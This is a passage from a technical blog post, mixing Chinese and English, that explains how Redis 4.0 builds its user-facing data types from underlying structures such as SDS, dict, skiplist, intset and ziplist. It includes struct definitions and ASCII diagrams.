byte array is that in some cases a string object can be interpreted on the server as an int/double and used directly in numeric operations (addition and subtraction, e.g. INCR and DECR).<br>The string object is the most basic type in Redis, because the values stored in almost all the data types below are strings.</p><h3 id="hash"><a href="#hash" class="headerlink" title="hash"></a>hash</h3><p>A hash table, sometimes also called a <code>map</code>, is conceptually similar to a dict in Python or a map in Golang. It stores a collection of key-value pairs.</p><h3 id="list"><a href="#list" class="headerlink" title="list"></a>list</h3><p>A list object can be thought of conceptually as a list in Python, a List in Java or a slice in Golang. "Conceptually", because their underlying implementations are in fact different. What they share is that each is an abstraction over a collection of items.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+-------+ +--------+--------+--------+--------+</span><br><span class="line">| key +-->| value1 | value2 | ...... 
| value n|</span><br><span class="line">+-------+ +--------+--------+--------+--------+</span><br></pre></td></tr></table></figure></p><p>(逻辑上 list 是这样的,实现上下面再讲)<br>Redis 中 list 对象可以插入数据到 list 头或尾上,由于其底层实现是一个双向链表(某些场景下不是),所以插入两端都是 O(1) 的。</p><h3 id="set"><a href="#set" class="headerlink" title="set"></a>set</h3><p>Set 对象有点像是 Python 里的 set,其存储的是多个<strong>互不相同</strong>的元素。由于 set 底层使用 hash table 存储(同上,某些场景下不是),所以其大部分操作都是 O(1) 的。</p><h3 id="zset"><a href="#zset" class="headerlink" title="zset"></a>zset</h3><p>zset 是有序集合,同 set 相似的是,其内部存储的元素也是不允许重复的。不同的是,set 中存储的元素是无序的,但是 zset 存储的元素是有序的。<br>通过为 zset 中每个元素设置一个 score,zset 根据元素的 score 排序。</p><h3 id="其他(略)"><a href="#其他(略)" class="headerlink" title="其他(略)"></a>其他(略)</h3><ul><li>HyperLogLog</li><li>GEO</li></ul><hr><h2 id="实现用户侧数据结构的底层结构"><a href="#实现用户侧数据结构的底层结构" class="headerlink" title="实现用户侧数据结构的底层结构"></a>实现用户侧数据结构的底层结构</h2><p>Redis 是通过 C 语言实现的,由于 C 语言的朴素,Redis 并没有直接实现上面提到的数据结构,而是通过构件了一系列基础的数据结构,经过对象系统对下层结构的封装,来实现上层面向用户的各种结构。<br>下面,先介绍下这些底层结构。</p><h3 id="SDS"><a href="#SDS" class="headerlink" title="SDS"></a>SDS</h3><p>SDS 是「 simple dynamic string 」的缩写,是对 C 字符串的抽象(其实 C 语言没有字符串…… 2333)。<br>SDS 的定义如下( <a href="https://github.com/antirez/redis/blob/4.0/src/sds.h#L44-73" target="_blank" rel="noopener">Redis4.0 sds 定义</a>,相比 3.0 及之前版本,目前版本包含多种格式的 sdshdr 定义):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> __<span class="title">attribute__</span> ((__<span class="title">packed__</span>)) <span class="title">sdshdr64</span> {</span></span><br><span class="line"> <span class="keyword">uint64_t</span> len; <span class="comment">/* used */</span></span><br><span class="line"> <span class="keyword">uint64_t</span> alloc; <span 
class="comment">/* excluding the header and null terminator */</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">char</span> flags; <span class="comment">/* 3 lsb of type, 5 unused bits */</span></span><br><span class="line"> <span class="keyword">char</span> buf[];</span><br><span class="line">};</span><br></pre></td></tr></table></figure></p><p>相比 C char array,sds 有以下优点:</p><ol><li>获取字符串长度效率更优。C 字符串只是一个 ‘\0’ 结尾的 char 数组,如果需要获取字符串长度,需要遍历整个数组,遍历操作时间复杂度为 O(N)。而 sds len 属性记录了本身的长度,获取长度只需要 O(1) 复杂度。</li><li>避免数组长度溢出。类似 strcat(dst, src) 等函数,如果 dst 数组剩下的空间小于 src 的长度,则在字符串连接的时候会导致数组溢出。而在 sds 中,执行字符串拼接等修改操作时,会先通过 len、alloc 属性检查剩下的空间是否足够。当空间不足时,会先分配足够的空间。</li><li>减少内存分配次数。sds 会通过预申请内存,在连接字符串等操作时,减少对内存的申请操作。同时,如果 sds 所保存的字符串变短了,也并不会立即释放内存,而是通过 len 记录已使用,剩余空间作为 buffer 暂时保留。</li><li>二进制安全。因为 C 字符串会以 ‘\0’ 作为结束符,所以如果在 char array 中存储图片等二进制数据时,空字符会被认为是结束符。而 sds 通过 len 属性记录 buf 使用的长度,则可以避免这样的问题。</li><li>兼容部分 C 字符串函数。sds 也会在 buf 已使用的最后一位后(<code>sds->buf[sds->len]</code>)插入一个 ‘\0’,这样在 sds 存储文本数据时,可以方便地复用一些 <code>string.h</code> 已有的函数。</li></ol><h3 id="linkedlist"><a href="#linkedlist" class="headerlink" title="linkedlist"></a>linkedlist</h3><p>Redis 中 linkedlist 是一个双向链表(<a href="https://github.com/antirez/redis/blob/4.0/src/adlist.h#L36-54" target="_blank" rel="noopener">Redis4.0 linkedlist 定义</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">listNode</span> {</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">listNode</span> *<span class="title">prev</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">listNode</span> *<span class="title">next</span>;</span></span><br><span class="line"> <span class="keyword">void</span> *value;</span><br><span class="line">} listNode;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">listIter</span> {</span></span><br><span class="line"> listNode *next;</span><br><span class="line"> <span class="keyword">int</span> direction;</span><br><span class="line">} listIter;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">list</span> {</span></span><br><span class="line"> listNode *head;</span><br><span class="line"> listNode *tail;</span><br><span class="line"> <span class="keyword">void</span> *(*dup)(<span class="keyword">void</span> *ptr);</span><br><span class="line"> <span class="keyword">void</span> (*<span class="built_in">free</span>)(<span class="keyword">void</span> *ptr);</span><br><span class="line"> <span class="keyword">int</span> (*match)(<span class="keyword">void</span> *ptr, <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> len;</span><br><span class="line">} <span class="built_in">list</span>;</span><br></pre></td></tr></table></figure></p><p>每个节点类似这样:<br><figure class="highlight plain"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">+---------+ +----------+ +----------+ +----------+</span><br><span class="line">| list | | listNode | | listNode | | listNode |</span><br><span class="line">+---------+ +----------+ next +----------+ next +----------+ next</span><br><span class="line">| head +-----------> +--------> +--------> +------->NULL</span><br><span class="line">| | | value | | value | | value |</span><br><span class="line">| tail +-+ NULL<--+ <--------+ <--------+ |</span><br><span class="line">| | | prev+----------+ prev +----------+ prev +-^--------+</span><br><span class="line">| len: 3 | | |</span><br><span class="line">| | +---------------------------------------------------+</span><br><span class="line">| dup +----> ...</span><br><span class="line">| |</span><br><span class="line">| free +----> ...</span><br><span class="line">| |</span><br><span class="line">| match +----> ...</span><br><span class="line">+---------+</span><br></pre></td></tr></table></figure></p><p>The list struct keeps the head and tail pointers of the linked list in head and tail. Together with each node's next and prev pointers, this makes it easy to traverse the list from either end.<br>In addition, the dup/free/match function pointers give the list polymorphic behavior:</p><ol><li>dup copies the value stored in a node</li><li>free releases the value stored in a node</li><li>match compares a node's value against a given key</li></ol><h3 id="dict"><a href="#dict" class="headerlink" title="dict"></a>dict</h3><p>dict is similar to dict in Python or map in Go.<br>In Redis, a dict is implemented by the dict struct, which stores its data in a hash table of dictEntry<dictentry> entries.<br>The hash table (dictht) and dictEntry are defined as follows(<a 
href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L69-74" target="_blank" rel="noopener">Redis4.0 dict 定义</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictEntry</span> {</span></span><br><span class="line"> <span class="keyword">void</span> *key;</span><br><span class="line"> <span class="keyword">union</span> {</span><br><span class="line"> <span class="keyword">void</span> *val;</span><br><span class="line"> <span class="keyword">uint64_t</span> u64;</span><br><span class="line"> <span class="keyword">int64_t</span> s64;</span><br><span class="line"> <span class="keyword">double</span> d;</span><br><span class="line"> } v;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">dictEntry</span> *<span class="title">next</span>;</span></span><br><span class="line">} dictEntry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictht</span> {</span></span><br><span class="line"> dictEntry **table; <span class="comment">// hash table 实际存储的位置</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> size; <span 
class="comment">// table 的大小</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> sizemask;</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> used; <span class="comment">// 已经使用的长度</span></span><br><span class="line">} dictht;</span><br></pre></td></tr></table></figure></dictentry></p><p>其中,dictEntry 是每个 key-value 对存储的结构,其 next 指针用于在 hash 冲突时,将多个 entry 连接一起:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">+----------+</span><br><span class="line">| dictht |</span><br><span class="line">+----------+ +----------+</span><br><span class="line">| table +--->| dictEntry|</span><br><span class="line">| | +----------+</span><br><span class="line">| size | | 0 +->NULL +---------+ +---------+</span><br><span class="line">| | +----------+ | entry | next | entry | next</span><br><span class="line">| sizemask| | 1 +------->+---------+----->+---------+----->NULL</span><br><span class="line">| | +----------+ | k1 | v1 | | k2 | v2 |</span><br><span class="line">| used | | 2 +->NULL +---------+ +---------+</span><br><span class="line">+----------+ +----------+</span><br><span class="line"> | 3 +->NULL</span><br><span class="line"> +----------+</span><br></pre></td></tr></table></figure></p><p>dict 的定义如下(<a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L76-82" target="_blank" rel="noopener">Redis4.0 dict 定义</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictType</span> {</span></span><br><span class="line"> <span class="comment">// 计算哈希值</span></span><br><span class="line"> <span class="keyword">uint64_t</span> (*hashFunction)(<span class="keyword">const</span> <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// 复制 key</span></span><br><span class="line"> <span class="keyword">void</span> *(*keyDup)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// 复制 value</span></span><br><span class="line"> <span class="keyword">void</span> *(*valDup)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *obj);</span><br><span class="line"> <span class="comment">// 比较 key</span></span><br><span class="line"> <span class="keyword">int</span> (*keyCompare)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *key1, <span class="keyword">const</span> <span class="keyword">void</span> *key2);</span><br><span 
class="line"> <span class="comment">// destroy key</span></span><br><span class="line"> <span class="keyword">void</span> (*keyDestructor)(<span class="keyword">void</span> *privdata, <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// destroy value</span></span><br><span class="line"> <span class="keyword">void</span> (*valDestructor)(<span class="keyword">void</span> *privdata, <span class="keyword">void</span> *obj);</span><br><span class="line">} dictType;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dict</span> {</span></span><br><span class="line"> dictType *type;</span><br><span class="line"> <span class="keyword">void</span> *privdata;</span><br><span class="line"> dictht ht[<span class="number">2</span>];</span><br><span class="line"> <span class="keyword">long</span> rehashidx; <span class="comment">/* rehashing not in progress if rehashidx == -1 */</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> iterators; <span class="comment">/* number of iterators currently running */</span></span><br><span class="line">} dict;</span><br></pre></td></tr></table></figure></p><p>Where:</p><ol><li>dictType is a struct holding a set of functions that operate on one particular type of entry. Different entry types supply different implementations, which is how dict achieves polymorphism.</li><li>privdata holds the type-specific argument that is passed to the functions in dictType (the privdata pointer in the function signatures above).</li><li>ht is an array of two dictht objects: ht[0] stores the data, and ht[1] is used during rehashing (only mentioned here; the dict rehash process will get a post of its own).</li><li>rehashidx records the rehash progress and is -1 when no rehash is in progress; it is not covered further here.</li></ol><p>More details of the dict structure will be covered in a later post.</p><h3 id="skiplist"><a href="#skiplist" class="headerlink" title="skiplist"></a>skiplist</h3><p>A skiplist (skip list) is an ordered structure in which each node keeps several pointers to other nodes, so that a node can be located in O(log N) time on average instead of by walking the whole list.</p><p>The skiplist is defined as follows (<a href="https://github.com/antirez/redis/blob/4.0/src/server.h#L760-774" target="_blank" rel="noopener">Redis 4.0 skiplist definition</a>):</p><figure class="highlight c"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistNode</span> {</span></span><br><span class="line"> sds ele;</span><br><span class="line"> <span class="keyword">double</span> score;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistNode</span> *<span class="title">backward</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistLevel</span> {</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistNode</span> *<span class="title">forward</span>;</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> span;</span><br><span class="line"> } level[];</span><br><span class="line">} zskiplistNode;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplist</span> {</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistNode</span> *<span class="title">header</span>, *<span class="title">tail</span>;</span> <span class="comment">// 头、尾指针</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span 
class="keyword">long</span> length; <span class="comment">// number of nodes</span></span><br><span class="line"> <span class="keyword">int</span> level;</span><br><span class="line">} zskiplist;</span><br></pre></td></tr></table></figure><p>As shown above, zskiplistNode stores each node's data and its pointers, while zskiplist holds the information about the skiplist as a whole.</p><h3 id="intset"><a href="#intset" class="headerlink" title="intset"></a>intset</h3><p>When a set contains only integers and has few elements, its underlying data structure is an intset.<br>The intset is defined as follows (<a href="https://github.com/antirez/redis/blob/4.0/src/intset.h#L35-39" target="_blank" rel="noopener">Redis 4.0 intset definition</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">intset</span> {</span></span><br><span class="line"> <span class="keyword">uint32_t</span> encoding;</span><br><span class="line"> <span class="keyword">uint32_t</span> length;</span><br><span class="line"> <span class="keyword">int8_t</span> contents[];</span><br><span class="line">} intset;</span><br></pre></td></tr></table></figure></p><p>The contents array stores the data: an intset keeps its integers in contents sorted in ascending order. The length field records the number of elements in the set.<br>encoding records the type of the elements stored in contents:</p><ul><li><code>INTSET_ENC_INT16</code> stores int16 integers</li><li><code>INTSET_ENC_INT32</code> stores int32 integers</li><li><code>INTSET_ENC_INT64</code> stores int64 integers</li></ul><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br></pre></td><td class="code"><pre><span class="line">+----------+</span><br><span class="line">| intset |</span><br><span class="line">+----------+</span><br><span class="line">| encoding|</span><br><span class="line">| INTSET_ENC_INT16</span><br><span class="line">| |</span><br><span class="line">| length |</span><br><span class="line">| 5 |</span><br><span class="line">| | +----+---+---+---+------+</span><br><span class="line">| contents+------>+ -4 | 0 | 3 | 6 | 1024 |</span><br><span class="line">+----------+ +----+---+---+---+------+</span><br></pre></td></tr></table></figure><p>When a new element is added to an intset and it needs a wider type than the current encoding (for example, inserting a 32-bit integer into an intset encoded as INTSET_ENC_INT16), the intset must first be upgraded before the element can be added. An upgrade switches the intset's encoding to the wider format and re-encodes every existing element at the new width. An intset is never downgraded after an upgrade, even if the wide elements are later deleted and only narrow ones remain.</p><h3 id="ziplist"><a href="#ziplist" class="headerlink" title="ziplist"></a>ziplist</h3><p>ziplist is one of the underlying implementations of list and hash (and, as described later, zset). When a list has few elements and contains only integers or short strings, its data is stored in a ziplist.<br>ziplist is a structure designed to save memory. It is essentially a char array with a specific layout or, more precisely, a byte sequence. Laid out, that byte sequence looks roughly like this:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+---------+--------+-------+--------+-----+--------+-------+ </span><br><span class="line">| zlbytes | zltail | zllen | entry1 | ... 
| entryN | zlend | </span><br><span class="line">+---------+--------+-------+--------+-----+--------+-------+</span><br></pre></td></tr></table></figure></p><p>The fields mean the following:</p><table><thead><tr><th>field</th><th>type</th><th>sizeof (bytes)</th><th>purpose</th></tr></thead><tbody><tr><td> zlbytes</td><td>uint32_t</td><td>4</td><td>Total length of the ziplist in bytes</td></tr><tr><td> zltail</td><td>uint32_t</td><td>4</td><td>Offset in bytes from the start of the ziplist to the last entry, so the tail entry can be located directly</td></tr><tr><td> zllen</td><td>uint16_t</td><td>2</td><td>Number of entries in the ziplist. When the field holds 65535 (the maximum of a uint16_t), the real count can only be obtained by traversing the whole ziplist</td></tr><tr><td> entry</td><td>ziplist entry</td><td>/</td><td>An element stored in the ziplist; its length depends on what it stores</td></tr><tr><td> zlend</td><td>uint8_t</td><td>1</td><td>Always 0xFF; marks the end of the ziplist</td></tr></tbody></table><p>Each entry, in turn, has the following layout:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+-----------------------+----------+---------+ </span><br><span class="line">| previous_entry_length | encoding | content |</span><br><span class="line">+-----------------------+----------+---------+</span><br></pre></td></tr></table></figure></p><p>The fields mean the following:</p><table><thead><tr><th>field</th><th>sizeof (bytes)</th><th>purpose</th></tr></thead><tbody><tr><td> previous_entry_length</td><td>1 or 5</td><td>Length of the previous entry in bytes, in one of two forms: 1. if the previous entry is shorter than 254 bytes, a single byte holds the length; 2. 
if the previous entry is 254 bytes or longer, the first byte of this field is always 0xFE and the following 4 bytes hold the previous entry's length</td></tr><tr><td> encoding</td><td>1 or 2 or 5</td><td>Records the data type and length of the current entry (details omitted in this post).</td></tr><tr><td> content</td><td>/</td><td>The data stored in the entry</td></tr></tbody></table><hr><h2 id="Redis-是如何通过底层结构构件上层数据类型的"><a href="#Redis-是如何通过底层结构构件上层数据类型的" class="headerlink" title="Redis 是如何通过底层结构构件上层数据类型的"></a>How Redis builds the user-facing data types from the underlying structures</h2><p>The sections above introduced the common user-facing data types and the structures Redis implements underneath to support them. This section describes how Redis builds the user-facing types out of those underlying structures.</p><h3 id="redisObject-对象"><a href="#redisObject-对象" class="headerlink" title="redisObject 对象"></a>redisObject</h3><p>Redis does not implement the user-facing data types directly. This lets it swap in whichever underlying structure suits the situation while hiding the implementation details from the user: depending on the trade-off between performance and memory usage, the same user-facing object can be backed by different underlying structures.</p><p>The <code>redisObject</code> struct provides this layer of indirection (<a href="https://github.com/antirez/redis/blob/4.0/src/server.h#L585-593" target="_blank" rel="noopener">Redis 4.0 redisObject definition</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">redisObject</span> {</span></span><br><span class="line"> <span class="keyword">unsigned</span> type:<span class="number">4</span>; <span class="comment">// type</span></span><br><span class="line"> <span class="keyword">unsigned</span> encoding:<span class="number">4</span>; <span class="comment">// encoding</span></span><br><span class="line"> <span class="keyword">unsigned</span> lru:LRU_BITS; <span class="comment">/* LRU time (relative to global lru_clock) or</span></span><br><span class="line"><span class="comment"> * LFU data (least significant 8 bits frequency</span></span><br><span class="line"><span class="comment"> * and most 
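significant 16 bits access time). */</span></span><br><span class="line"> <span class="keyword">int</span> refcount;</span><br><span class="line"> <span class="keyword">void</span> *ptr; <span class="comment">// pointer to the underlying data structure</span></span><br><span class="line">} robj;</span><br></pre></td></tr></table></figure></p><p>In the struct above, the <code>type</code> field records the object's type, that is, one of the user-facing data types (string/list/hash, etc.). You can check the type of any key by running <code>TYPE key</code> in redis-cli.</p><p>The encoding field identifies the underlying structure that backs this redisObject (sds/ziplist/dict and so on, as described above). Common encodings are listed below (these are the constant names used up to Redis 3.0; from Redis 3.2 on the prefix is <code>OBJ_ENCODING_</code>):</p><table><thead><tr><th>encoding</th><th>underlying structure</th></tr></thead><tbody><tr><td>REDIS_ENCODING_INT</td><td>integer</td></tr><tr><td>REDIS_ENCODING_RAW</td><td>sds</td></tr><tr><td>REDIS_ENCODING_EMBSTR</td><td>embstr-encoded sds</td></tr><tr><td>REDIS_ENCODING_HT</td><td>dict</td></tr><tr><td>REDIS_ENCODING_LINKEDLIST</td><td>linkedlist</td></tr><tr><td>REDIS_ENCODING_ZIPLIST</td><td>ziplist</td></tr><tr><td>REDIS_ENCODING_INTSET</td><td>intset</td></tr><tr><td>REDIS_ENCODING_SKIPLIST</td><td>skiplist</td></tr></tbody></table><p>You can check which underlying structure backs a key by running <code>OBJECT ENCODING key</code> in redis-cli.</p><h3 id="string-–-gt-int-raw-embstr"><a href="#string-–-gt-int-raw-embstr" class="headerlink" title="string –> int/raw/embstr"></a>string –> int/raw/embstr</h3><p>Depending on the situation, a string is stored with the int, raw, or embstr encoding (embstr is an encoding optimized for short strings).</p><ol><li>If the value is an integer that fits in a long (8 bytes on 64-bit platforms), the string object uses the int encoding, and the integer is stored directly in the redisObject's ptr field rather than in a separately allocated object.</li><li>If the value is a string longer than 44 bytes (the limit in Redis 3.2 and later, including 4.0; Redis 3.0 used 39), the string object uses the raw encoding, and ptr points to a separately allocated sds.</li><li>If the value is a string of at most 44 bytes, it is stored with the embstr encoding, where the redisObject and its sds share one contiguous allocation.</li></ol><p>When an int-encoded value is overwritten with a string, or changed by a string command such as APPEND so that it is no longer an integer, Redis converts its encoding from int to raw. INCR does not trigger this conversion: an increment that would overflow a 64-bit signed integer is rejected with an error.<br>When an embstr-encoded value is modified, its encoding changes to raw; in other words, embstr is effectively read-only.</p><h3 id="list-–-gt-ziplist-linkedlist"><a href="#list-–-gt-ziplist-linkedlist" class="headerlink" title="list –> ziplist/linkedlist"></a>list –> ziplist/linkedlist</h3><p>The list type has two underlying implementations: 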
ziplist and linkedlist.</p><ol><li>When every element of the list is at most <code>list-max-ziplist-value</code> bytes long and the number of elements does not exceed <code>list-max-ziplist-entries</code>, ziplist is used.</li><li>Otherwise, linkedlist is used.</li></ol><p>As soon as a ziplist-encoded list no longer satisfies either of the two conditions in <code>1</code> above, Redis converts the value's encoding from ziplist to linkedlist. Note that this describes Redis 3.0 and earlier: since Redis 3.2, lists are stored as a quicklist (a linked list of ziplists), and these two options were replaced by <code>list-max-ziplist-size</code>.</p><h3 id="hash-–-gt-ziplist-hashtable"><a href="#hash-–-gt-ziplist-hashtable" class="headerlink" title="hash –> ziplist/hashtable"></a>hash –> ziplist/hashtable</h3><p>A hash can be backed by either a ziplist or a hashtable.</p><ol><li>When every key and value in the hash is at most <code>hash-max-ziplist-value</code> bytes long and the number of key-value pairs does not exceed <code>hash-max-ziplist-entries</code>, the hash object is stored in a ziplist.</li><li>Otherwise, hashtable is used.</li></ol><p>When a ziplist backs a hash, each key-value pair is placed contiguously in the ziplist, the key immediately followed by its value:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">+---------+--------+-------+------+--------+------+--------+-----+------+--------+-------+</span><br><span class="line">| zlbytes | zltail | zllen | key1 | value1 | key2 | value2 | ... 
| keyN | valueN | zlend | </span><br><span class="line">+---------+--------+-------+--^---+---^----+------+--------+-----+------+--------+-------+</span><br><span class="line"> | |</span><br><span class="line"> +-------+</span><br><span class="line"> key-value pair</span><br></pre></td></tr></table></figure></p><p>As with list, when a hash object no longer satisfies either of the two conditions in <code>1</code> above, its encoding is converted from ziplist to hashtable.</p><h3 id="set-–-gt-intset-hashtable"><a href="#set-–-gt-intset-hashtable" class="headerlink" title="set –> intset/hashtable"></a>set –> intset/hashtable</h3><p>A set has two underlying implementations: intset and hashtable.</p><ol><li>When every element of the set is an integer and the number of elements does not exceed <code>set-max-intset-entries</code>, intset is used as the underlying encoding.</li><li>Otherwise, hashtable is used.</li></ol><p>The diagrams below show how a set object is stored with intset and with hashtable, respectively:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">+---------------+</span><br><span class="line">| redisObject |</span><br><span class="line">+---------------+ +-------------+</span><br><span class="line">| type | | intset |</span><br><span 
class="line">| REDIS_SET | +-------------+</span><br><span class="line">+---------------+ | encoding |</span><br><span class="line">| encoding | | INTSET_ENC_INT16</span><br><span class="line">| REDIS_ENCODING_INTSET +-------------+ </span><br><span class="line">+---------------+ | length |</span><br><span class="line">| ptr +-------->| 3 |</span><br><span class="line">+---------------+ +-------------+ +---+---+---+</span><br><span class="line">| ... | | contents +-->| 1 | 3 | 5 |</span><br><span class="line">+---------------+ +-------------+ +---+---+---+</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">+---------------+</span><br><span class="line">| redisObject |</span><br><span class="line">+---------------+ +-------------+</span><br><span class="line">| type | | dict |</span><br><span class="line">| REDIS_SET | +-------------+</span><br><span class="line">+---------------+ | StringObject|</span><br><span class="line">| encoding | | "haha" +-->NULL</span><br><span class="line">| REDIS_ENCODING_HT +-------------+</span><br><span class="line">+---------------+ | StringObject|</span><br><span class="line">| ptr +-------->+ "hehe" +-->NULL</span><br><span class="line">+---------------+ +-------------|</span><br><span class="line">| ... 
